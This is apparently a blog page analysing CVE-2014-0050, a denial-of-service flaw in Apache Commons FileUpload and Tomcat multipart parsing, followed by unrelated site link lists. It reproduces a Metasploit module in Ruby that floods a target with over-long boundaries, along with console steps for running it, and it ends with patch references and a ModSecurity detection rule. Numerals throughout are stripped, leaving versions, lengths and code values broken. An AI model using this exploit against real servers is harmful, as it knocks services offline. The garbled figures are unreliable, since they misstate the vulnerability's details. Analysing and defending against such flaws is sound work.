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f+vEHy67xN92C3WTJQ+6J95kUdFp9GSbN8ztHTMVrVtc2KS1q5Efn1dvupjHu3661k1f0dnltf582T7N6jnf2LiIh8PopMRaYiM5rzM4rMaaZ+15Lfd2vP3XB/V618d3prm80nc/j9FRFZm+nqzdM/rl+IjcvXe+wtGnR/fQVPuMWjtD1SGSgautug+GWl2eJ1Uo0NR8mnGs0kL0SSamDVKMM1z5flPtdbSXJ1wzdMNMO174RVk6zcERERkftnWP61z/f5U29YNiSFRDJQNHS3QfHLSrPF652lxeeLruIowzXPl+U+11tJcnXDN0w0w7XvhFWTrNyRPZ3n17t4HY1eXKv2znYPtvd37dtvOL2oWXfOq5ZRROSMTFdvnv5x/UJsWbtC0fD+btQsf/YUHwlTI5peMtzmJ1z7ujLc8ALXnjuc8LDaWztK0sPa8uKS660kubpKxTbss7IyqyZZuSMiIiI3jyIz6lCRqciszLDSeO0kK3dkT+fF652PW1mZ4hujONbat9/+3/sblktE5LxMV2+e/nH9QmxfwdGndveRUCyJioVR0v7z1e2qJ2ulLtlz7rA4W1uiHVvdXnW93ZJreLvzGRarvfrV1euhbdXtqiFEREQ+H0Vmcc6KzPtcryKzPkTxN0J33KPOrdzf+RWtWvl8Afevc9KhiMhJma7ePP3j+oU4d5VnoiOL48mRaIhX/JyLhp5/Nxq6exX5heRDdBcnX5Z8MvlaTT3dlXk1D+zoKqKek3Fvdb3dEYtv3XahojknM4zewElXw+lN8T1KlrSyCCIiIrdN+6ROnt2VQqI7xGv2pO6WFu3QbeGRPIW7zZIToyG6i5MvSz6ZfK2mnu7KvH6WOslVRD0n497qersjFt+67UJFc05mGL2Bk66G05vie5QsabH/+rK0I3bHPerc9svKzCsLmDerzzm64yIi58UWquzK855ba6/oS1dgz7R3XnJen31yYb/03omIiPyGPO8xrcg8+5J/T5G52G08+3LumV974SJyYWyhyvZEdcnvyTeuwJ4Jf+Z6nzGEiIiIbM43llhWQJH5mSE+uWIiIjKPLVQRERERERERERGRMLZQRURERERERERERMLYQhUREREREREREREJYwtVREREREREREREJIwtVBERERF5Zv7v/xUREREROSC2UEVERETkmbm81BYRERGRZ8QWqoickm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" alt="" />

The fixed code has an extra "if" condition (line number 330) that validates the length of the multipart boundary to be shorter than 4091 characters, raising an exception if that's not the case. The calculation is as follows:

boundary.length > bufSize –  – BOUNDARY_PREFIX.length =  –  –  =

//parts of the code were copied into the org.apache.tomcat.util.http.fileupload package in Apache Tomcat, causing it to be affected.

0x2: Creating the exploit

So let's get Apache Tomcat installed and try to send more than 4091 characters in the boundary field to the Apache Tomcat Manager application. Such a request might look like this:

0x3: Why is this happening

While parsing the multipart message, the following "for" loop is used by the MultipartStream class:

The innocent-looking "for" loop above is an endless loop. It is "family related" to the famous "while(true)" loop. The developer's intention was to exit this loop either by raising an exception (line 1003) or by returning a value (line 1014), unfortunately when the boundary is longer than 4091 characters (as explained earlier) and the body is longer than 4096 characters (so it can potentially contain the boundary), neither would ever occur

Relevant Link:

https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2014-0050--Exploit-with-Boundaries,-Loops-without-Boundaries/

3. POC

0x1: Metasploit

msf > use auxiliary/dos/http/apache_commons_fileupload_dos

msf auxiliary(apache_commons_fileupload_dos) > show actions

    ...actions...

msf auxiliary(apache_commons_fileupload_dos) > set ACTION <action-name>

msf auxiliary(apache_commons_fileupload_dos) > show options

    ...show and set options...

msf auxiliary(apache_commons_fileupload_dos) > run

0x2: apache_commons_fileupload_dos.rb

##

# This module requires Metasploit: http://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

require 'msf/core'

class Metasploit4 < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient

  include Msf::Auxiliary::Dos

  def initialize(info = {})

    super(update_info(info,

      'Name'            => 'Apache Commons FileUpload and Apache Tomcat DoS',

      'Description'     => %q{

        This module triggers an infinite loop in Apache Commons FileUpload 1.0

        through 1.3 via a specially crafted Content-Type header.

        Apache Tomcat  and Apache Tomcat  use a copy of FileUpload to handle

        mime-multipart requests, therefore, Apache Tomcat 7.0. through 7.0.

        and 8.0.-RC1 through 8.0. are affected by this issue. Tomcat  also

        uses Commons FileUpload as part of the Manager application.

       },

       'Author'         =>

         [

           'Unknown', # This issue was reported to the Apache Software Foundation and accidentally made public.

           'ribeirux' # metasploit module

         ],

       'License'        => MSF_LICENSE,

       'References'     =>

         [

           ['CVE', '2014-0050'],

           ['URL', 'http://tomcat.apache.org/security-8.html'],

           ['URL', 'http://tomcat.apache.org/security-7.html']

         ],

        'DisclosureDate' => 'Feb 6 2014'

      ))

      register_options(

        [

          Opt::RPORT(),

          OptString.new('TARGETURI', [ true,  "The request URI", '/']),

          OptInt.new('RLIMIT', [ true,  "Number of requests to send",])

        ], self.class)

  end

  def run

    boundary = ""*

    opts = {

      'method'         => "POST",

      'uri'            => normalize_uri(target_uri.to_s),

      'ctype'          => "multipart/form-data; boundary=#{boundary}",

      'data'           => "#{boundary}00000",

      'headers' => {

        'Accept' => '*/*'

      }

    }

    # XXX: There is rarely, if ever, a need for a 'for' loop in Ruby

    # This should be rewritten with .upto() or Enumerable#each or

    # something

    for x in ..datastore['RLIMIT']

      print_status("Sending request #{x} to #{peer}")

      begin

        c = connect

        r = c.request_cgi(opts)

        c.send_request(r)

        # Don't wait for a response

      rescue ::Rex::ConnectionError => exception

        print_error("#{peer} - Unable to connect: '#{exception.message}'")

        return

      ensure

        disconnect(c) if c

      end

    end

  end

end

Relevant Link:

https://www.rapid7.com/db/modules/auxiliary/dos/http/apache_commons_fileupload_dos

https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb

4. Solution

0x1: Defend yourself 

. Once available, update your software to one of the following versions:

Apache Commons FileUpload 1.3.

Apache Tomcat 7.0.

Apache Tomcat 8.0.

. You may choose to apply the appropriate patch:

Apache Commons FileUpload: http://svn.apache.org/r1565143

Apache Tomcat : http://svn.apache.org/r1565163

Apache Tomcat : http://svn.apache.org/r1565169

0x2: ModSecurity Commercial Rule Set

SecRule REQUEST_HEADERS:Content-Type "@rx .{4000}"

Relevant Link:

http://tomcat.apache.org/security-7.html

Copyright (c) 2015 Little5ann All rights reserved

CVE-2014-0050: Exploit with Boundaries, Loops without Boundaries、Apache Commons FileUpload and Apache Tomcat DoS的更多相关文章

  1. <2014 08 29> MATLAB的软件结构与模块、工具箱简示

    MATLAB的系统结构:三个层次.九个部分 ----------------------------------- 一.基础层 是整个系统的基础,核心内容是MATLAB部分. 1.软件主包MATLAB ...

  2. 2014.1.21 DNS大事故(dns原理、网络封锁原理)

    1.21那天发生了什么,由1.21联想补充……  很多网站都上不去,域名解析都到了65.49.2.178这个IP地址 先科普,再深挖  dns查询类型 递归查询,迭代查询   DNS解析过程,这里使用 ...

  3. 小白日记15:kali渗透测试之弱点扫描-漏扫三招、漏洞管理、CVE、CVSS、NVD

    发现漏洞 弱点发现方法: 1.基于端口服务扫描结果版本信息,比对其是否为最新版本,若不是则去其 官网查看其补丁列表,然后去逐个尝试,但是此法弊端很大,因为各种端口应用比较多,造成耗时大. 2.搜索已公 ...

  4. fastjson反序列化漏洞原理及利用

    重要漏洞利用poc及版本 我是从github上的参考中直接copy的exp,这个类就是要注入的类 import java.lang.Runtime; import java.lang.Process; ...

  5. J2EE项目开发中常用到的公共方法

    在项目IDCM中涉及到多种工单,包括有:服务器|网络设备上下架工单.服务器|网络设备重启工单.服务器光纤网线更换工单.网络设备撤线布线工单.服务器|网络设备替换工单.服务器|网络设备RMA工单.通用原 ...

  6. J2EE相关总结

    Java Commons The Java™ Tutorials: http://docs.oracle.com/javase/tutorial/index.html Java Platform, E ...

  7. DatagramChannel

    DatagramChannel 最后一个socket通道是DatagramChannel.正如SocketChannel对应Socket,ServerSocketChannel对应ServerSock ...

  8. Servlet实现文件上传

    一.Servlet实现文件上传,需要添加第三方提供的jar包 下载地址: 1) commons-fileupload-1.2.2-bin.zip      :   点击打开链接 2) commons- ...

  9. 使用jetty和mongodb实现简易网盘接口

    依赖库: 1,jetty(提供http方式接口) 2,mongodb的java驱动(访问mongodb存取文件) 3,thumbnailator包,进行缩略图生成 4,commons-fileuplo ...

随机推荐

  1. hadoop资料收集

    大数据时代——为什么用hadoop hadoop应用场景 Hadoop一般用在哪些业务场景? Hadoop虽然强大,但不是万能的

  2. 您的项目引用了最新实体框架;但是,找不到数据链接所需的与版本兼容的实体框架数据库 EF6使用Mysql的技巧

    转载至: http://www.cnblogs.com/Imaigne/p/4153397.html 您的项目引用了最新实体框架:但是,找不到数据链接所需的与版本兼容的实体框架数据库 EF6使用Mys ...

  3. zepto笔记 001

    $(function(){}) 在页面加载完成后运行的方法 等于window.onload; $("#id"),$(this) 都和jquery一样, tap方法不能阻止事件冒泡, ...

  4. mysql full text全文索引必要条件

    show variables like 'ft_m%' 'ft_max_word_len', '84''ft_min_word_len', '4' 对于英文来说, ft_min_word_len=4是 ...

  5. HDInsight - 1,简介

    最近工作需要,要看HDInsight部分,这里要做笔记.自然是官网资料最权威,所以内容都从这里搬过来:https://azure.microsoft.com/en-us/documentation/a ...

  6. java机器学习工具包

    下面是25个Java机器学习的工具&&库列表: 1. Weka 是一个数据挖掘任务机器学习算法的集合.这些算法可以直接应用于数据集或者在你自己的Java代码中调用.Weka 包含 数据 ...

  7. date 显示或设置系统时间和日期

    显示或设置系统时间和日期 date [options] [+format] date [options] [new date] date用来显示系统的时间和日期,超级用户可以使用date来更改系统时钟 ...

  8. canvas三角函数直线运动

    var canvas = document.getElementById("canvas"); var cxt = canvas.getContext("2d" ...

  9. oracle修改表字段

    --添加字段 )); -- 修改字段的长度- ));

  10. Redis集群(二):Redis的安装

    官方网站:http://redis.io/ 本系列撒使用的版本是:3.0.0 一.安装必要包 yum -yinstall gcc 二.linux下安装及使用(wget下载到当前目录) redis-3. ...